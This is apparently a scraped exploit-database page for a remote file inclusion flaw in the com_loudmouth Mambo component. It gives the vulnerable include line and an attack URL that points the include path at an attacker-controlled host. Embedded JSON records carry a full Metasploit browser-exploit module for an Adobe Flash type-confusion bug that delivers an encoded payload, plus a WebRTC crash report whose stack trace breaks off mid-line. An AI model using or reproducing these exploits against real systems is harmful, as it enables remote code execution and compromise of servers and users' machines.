Search...

com_loudmouth Mambo Component <= 4.0j Include Vulnerability

2006-07-17T00:00:00

ID 1337DAY-ID-585
Type zdt
Reporter h4ntu
Modified 2006-07-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
com_loudmouth Mambo Component &lt;= 4.0j Include Vulnerability
===========================================================




Bug Found by h4ntu [http://h4ntu.com]  #batamhacker crew
Another Mambo component remote inclusion vulneribility
 
download : http://mamboxchange.com/frs/download.php/7911/com_loudmouth-4.0j.zip

bug found in file abbc.class.php :

include( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');

http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
 
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink




#  0day.today [2018-04-14]  #

JSON Vulners Source

Initial Source

{"hash": "80e0ce69929940d498a5a0c793e69896578a96b6aad32c3fd1096fdfb5e7d10e", "id": "1337DAY-ID-585", "lastseen": "2018-04-14T08:19:09", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "1a51e9e6f0a2a8c4f293e57790d803c7", "key": "href"}, {"hash": "a709325226198250a27b845e7f60cd98", "key": "modified"}, {"hash": "a709325226198250a27b845e7f60cd98", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5d7e0a2d09fcc65a8dceed366761c388", "key": "reporter"}, {"hash": "5b12ddd222ee61edd5c657e188bfcde4", "key": "sourceData"}, {"hash": "82578a5802839e0c359051ebbed62511", "key": "sourceHref"}, {"hash": "2313e1427cf2f52a89abbcbad3851c02", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31638", "1337DAY-ID-31144", "1337DAY-ID-30515", "1337DAY-ID-27710", "1337DAY-ID-27576", "1337DAY-ID-25253", "1337DAY-ID-25986", "1337DAY-ID-25407", "1337DAY-ID-25735"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2016-0610.NASL", "SMB_NT_MS16-050.NASL", "FLASH_PLAYER_APSB16-10.NASL", "MACOSX_FLASH_PLAYER_APSB16-10.NASL", "SMB_NT_MS15-124.NASL"]}, {"type": "archlinux", "idList": ["ASA-201604-7"]}, {"type": "cve", "idList": ["CVE-2016-1013", "CVE-2016-1011", "CVE-2014-0160"]}, {"type": "redhat", "idList": ["RHSA-2016:0610"]}, {"type": "exploitdb", "idList": ["EDB-ID:39047"]}], "modified": "2018-04-14T08:19:09"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/585", "description": "Exploit for unknown platform in category web applications", "title": "com_loudmouth Mambo Component <= 4.0j Include Vulnerability", "history": [{"bulletin": {"hash": "8787c6c38a6e6e60162415e5ed923573d265b2b258edce2b422bd3d144b14007", "id": "1337DAY-ID-585", "lastseen": "2016-04-19T10:13:02", "enchantments": {"score": {"value": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P/", "modified": "2016-04-19T10:13:02"}}, "hashmap": [{"hash": "b49ab85af85f942f6a5bdf771e4d783f", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "61398e8480a0c7e4ba17a7caf9608a46", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5d7e0a2d09fcc65a8dceed366761c388", "key": "reporter"}, {"hash": "a709325226198250a27b845e7f60cd98", "key": "modified"}, {"hash": "a709325226198250a27b845e7f60cd98", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2313e1427cf2f52a89abbcbad3851c02", "key": "title"}, {"hash": "24aca69b0da827bda6a03fda89679150", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/585", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "com_loudmouth Mambo Component <= 4.0j Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\ncom_loudmouth Mambo Component <= 4.0j Include Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n\r\nBug Found by h4ntu [http://h4ntu.com] #batamhacker crew\r\nAnother Mambo component remote inclusion vulneribility\r\n \r\ndownload : http://mamboxchange.com/frs/download.php/7911/com_loudmouth-4.0j.zip\r\n\r\nbug found in file abbc.class.php :\r\n\r\ninclude( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');\r\n\r\nhttp://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]\r\n \r\nGreetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-07-17T00:00:00", "references": [], "reporter": "h4ntu", "modified": "2006-07-17T00:00:00", "href": "http://0day.today/exploit/description/585"}, "lastseen": "2016-04-19T10:13:02", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\ncom_loudmouth Mambo Component <= 4.0j Include Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n\r\nBug Found by h4ntu [http://h4ntu.com] #batamhacker crew\r\nAnother Mambo component remote inclusion vulneribility\r\n \r\ndownload : http://mamboxchange.com/frs/download.php/7911/com_loudmouth-4.0j.zip\r\n\r\nbug found in file abbc.class.php :\r\n\r\ninclude( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');\r\n\r\nhttp://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]\r\n \r\nGreetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "published": "2006-07-17T00:00:00", "references": [], "reporter": "h4ntu", "modified": "2006-07-17T00:00:00", "href": "https://0day.today/exploit/description/585"}

{"exploitdb": [{"lastseen": "2019-02-11T15:20:31", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "EDB-ID:46339", "href": "https://www.exploit-db.com/exploits/46339", "type": "exploitdb", "title": "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\r\n 'Description' => %q(\r\n This module exploits a type confusion on Adobe Flash Player, which was\r\n originally found being successfully exploited in the wild. This module\r\n has been tested successfully on:\r\n macOS Sierra 10.12.3,\r\n Safari and Adobe Flash Player 21.0.0.182,\r\n Firefox and Adobe Flash Player 21.0.0.182.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\r\n 'bcook-r7' # Imported Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-4117'],\r\n ['BID', '90505'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\r\n ['URL', 'http://www.securitytracker.com/id/1035826'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['osx'],\r\n 'BrowserRequirements' =>\r\n {\r\n source: /script|headers/i,\r\n os_name: lambda do |os|\r\n os =~ OperatingSystems::Match::MAC_OSX\r\n end,\r\n ua_name: lambda do |ua|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if ua == Msf::HttpClients::SAFARI\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n flash: lambda do |ver|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [\r\n 'Mac OS X', {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 27 2016',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri.end_with? 'swf'\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n\r\n if target.name.include? 'osx'\r\n platform_id = 'osx'\r\n end\r\n html_template = %(<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n )\r\n\r\n return html_template, binding\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\r\n File.binread(path)\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46339"}, {"lastseen": "2018-10-07T14:34:27", "bulletinFamily": "exploit", "description": "WebRTC - FEC Out-of-Bounds Read. CVE-2018-16083. Dos exploit for Multiple platform. Tags: Out Of Bounds", "modified": "2018-09-21T00:00:00", "published": "2018-09-21T00:00:00", "id": "EDB-ID:45444", "href": "https://www.exploit-db.com/exploits/45444/", "type": "exploitdb", "title": "WebRTC - FEC Out-of-Bounds Read", "sourceData": "There is an out-of-bounds read in FEC processing in WebRTC. If a very short RTP packet is received, FEC will assume the packet is longer and process data outside of the allocated buffer.\r\n\r\nThis bug causes the following ASAN crash:\r\n\r\n==109993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b003b7ff70 at pc 0x55e01a250cd1 bp 0x7fa3af7abc40 sp 0x7fa3af7abc38\r\nREAD of size 1 at 0x61b003b7ff70 thread T15 (Chrome_libJingl)\r\n #0 0x55e01a250cd0 in XorPayloads third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34\r\n #1 0x55e01a250cd0 in webrtc::ForwardErrorCorrection::RecoverPacket(webrtc::ForwardErrorCorrection::ReceivedFecPacket const&, webrtc::ForwardErrorCorrection::RecoveredPacket*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:630\r\n #2 0x55e01a251162 in webrtc::ForwardErrorCorrection::AttemptRecovery(std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:652:12\r\n #3 0x55e01a251b12 in webrtc::ForwardErrorCorrection::DecodeFec(webrtc::ForwardErrorCorrection::ReceivedPacket const&, std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:739:3\r\n #4 0x55e01a4c5595 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:248:11\r\n #5 0x55e01a4a1bb9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:419:23\r\n #6 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #7 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #8 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #9 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #10 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #11 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #12 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #13 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #14 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #15 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #16 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #17 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #18 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #19 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #20 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #21 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #22 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #23 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #24 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #25 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #26 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n\r\n0x61b003b7ff70 is located 0 bytes to the right of 1520-byte region [0x61b003b7f980,0x61b003b7ff70)\r\nallocated by thread T15 (Chrome_libJingl) here:\r\n #0 0x55e00607ef92 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3\r\n #1 0x55e01a4c3eeb in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:101:26\r\n #2 0x55e01a4a1b6f in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:414:27\r\n #3 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #4 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #5 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #6 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #7 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #8 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #9 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #10 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #11 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #12 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #13 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #14 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #15 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #16 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #17 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #18 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #19 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #20 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #21 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #22 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #23 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n\r\nThread T15 (Chrome_libJingl) created by T0 (chrome) here:\r\n #0 0x55e00603bb7d in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3\r\n #1 0x55e00d73b99e in base::(anonymous namespace)::CreateThread(unsigned long, bool, base::PlatformThread::Delegate*, base::PlatformThreadHandle*, base::ThreadPriority) base/threading/platform_thread_posix.cc:115:13\r\n #2 0x55e00d686be9 in base::Thread::StartWithOptions(base::Thread::Options const&) base/threading/thread.cc:112:15\r\n #3 0x55e00d68684b in base::Thread::Start() base/threading/thread.cc:75:10\r\n #4 0x55e01a09ba37 in content::PeerConnectionDependencyFactory::CreatePeerConnectionFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:177:3\r\n #5 0x55e01a09b4d0 in content::PeerConnectionDependencyFactory::GetPcFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:139:5\r\n #6 0x55e01a09df09 in content::PeerConnectionDependencyFactory::CreatePeerConnection(webrtc::PeerConnectionInterface::RTCConfiguration const&, blink::WebLocalFrame*, webrtc::PeerConnectionObserver*) content/renderer/media/webrtc/peer_connection_dependency_factory.cc:340:8\r\n #7 0x55e01aa63b1b in content::RTCPeerConnectionHandler::Initialize(blink::WebRTCConfiguration const&, blink::WebMediaConstraints const&) content/renderer/media/webrtc/rtc_peer_connection_handler.cc:1333:50\r\n #8 0x55e01baafde2 in blink::RTCPeerConnection::RTCPeerConnection(blink::ExecutionContext*, blink::WebRTCConfiguration const&, blink::WebMediaConstraints, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:585:23\r\n #9 0x55e01baaaedc in blink::RTCPeerConnection::Create(blink::ExecutionContext*, blink::RTCConfiguration const&, blink::Dictionary const&, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:518:44\r\n #10 0x55e01bb1ad0b in constructor gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1317:29\r\n #11 0x55e01bb1ad0b in blink::V8RTCPeerConnection::constructorCallback(v8::FunctionCallbackInfo<v8::Value> const&) gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1667\r\n #12 0x55e00ab4db49 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) v8/src/api-arguments-inl.h:94:3\r\n #13 0x55e00ab4a4c4 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:109:36\r\n #14 0x55e00ab48eb3 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5\r\n #15 0x55e00c2fce0d (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xde74e0d)\r\n #16 0x55e00c263d3f (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbd3f)\r\n #17 0x7e9c7b70dd69 (<unknown module>)\r\n #18 0x7e9c7b68868f (<unknown module>)\r\n #19 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #20 0x55e00c263c60 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbc60)\r\n #21 0x7e9c7b70dd69 (<unknown module>)\r\n #22 0x7e9c7b68868f (<unknown module>)\r\n #23 0x7e9c7b68868f (<unknown module>)\r\n #24 0x7e9c7b68868f (<unknown module>)\r\n #25 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #26 0x55e00c265722 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddd722)\r\n #27 0x7e9c7b684820 (<unknown module>)\r\n #28 0x55e00b3b4130 in Call v8/src/simulator.h:113:12\r\n #29 0x55e00b3b4130 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) v8/src/execution.cc:155\r\n #30 0x55e00b3b3993 in CallInternal v8/src/execution.cc:191:10\r\n #31 0x55e00b3b3993 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:202\r\n #32 0x55e00aa107b4 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:5218:7\r\n #33 0x55e015fe0a61 in blink::V8ScriptRunner::CallFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/blink/renderer/bindings/core/v8/v8_script_runner.cc:386:17\r\n #34 0x55e016028398 in blink::V8EventListener::CallListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_event_listener.cc:115:8\r\n #35 0x55e016029a54 in blink::V8AbstractEventListener::InvokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:171:20\r\n #36 0x55e01602942b in blink::V8AbstractEventListener::HandleEvent(blink::ScriptState*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:120:3\r\n #37 0x55e016029103 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:108:3\r\n #38 0x55e017446ebe in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/blink/renderer/core/dom/events/event_target.cc:804:15\r\n #39 0x55e017445121 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:656:29\r\n #40 0x55e017444d5b in blink::EventTarget::DispatchEventInternal(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:560:41\r\n #41 0x55e017a0de87 in Create third_party/blink/renderer/core/events/progress_event.h:44:16\r\n #42 0x55e017a0de87 in blink::FileReader::FireEvent(WTF::AtomicString const&) third_party/blink/renderer/core/fileapi/file_reader.cc:471\r\n #43 0x55e017a0e6d4 in blink::FileReader::DidFinishLoading() third_party/blink/renderer/core/fileapi/file_reader.cc:427:3\r\n #44 0x55e00a9494ef in blink::mojom::blink::BlobReaderClientStubDispatch::Accept(blink::mojom::blink::BlobReaderClient*, mojo::Message*) gen/third_party/blink/public/mojom/blob/blob.mojom-blink.cc:168:13\r\n #45 0x55e00ea14f7e in mojo::InterfaceEndpointClient::HandleValidatedMessage(mojo::Message*) mojo/public/cpp/bindings/lib/interface_endpoint_client.cc:419:32\r\n #46 0x55e00ea258b3 in mojo::internal::MultiplexRouter::ProcessIncomingMessage(mojo::internal::MultiplexRouter::MessageWrapper*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) mojo/public/cpp/bindings/lib/multiplex_router.cc:865:42\r\n #47 0x55e00ea2409e in mojo::internal::MultiplexRouter::Accept(mojo::Message*) mojo/public/cpp/bindings/lib/multiplex_router.cc:589:38\r\n #48 0x55e00ea0efa7 in mojo::Connector::ReadSingleMessage(unsigned int*) mojo/public/cpp/bindings/lib/connector.cc:443:51\r\n #49 0x55e00ea1081c in mojo::Connector::ReadAllAvailableMessages() mojo/public/cpp/bindings/lib/connector.cc:472:10\r\n #50 0x55e00ea00642 in Run base/callback.h:125:12\r\n #51 0x55e00ea00642 in mojo::SimpleWatcher::OnHandleReady(int, unsigned int, mojo::HandleSignalsState const&) mojo/public/cpp/system/simple_watcher.cc:274\r\n #52 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #53 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #54 0x55e00c4afc95 in 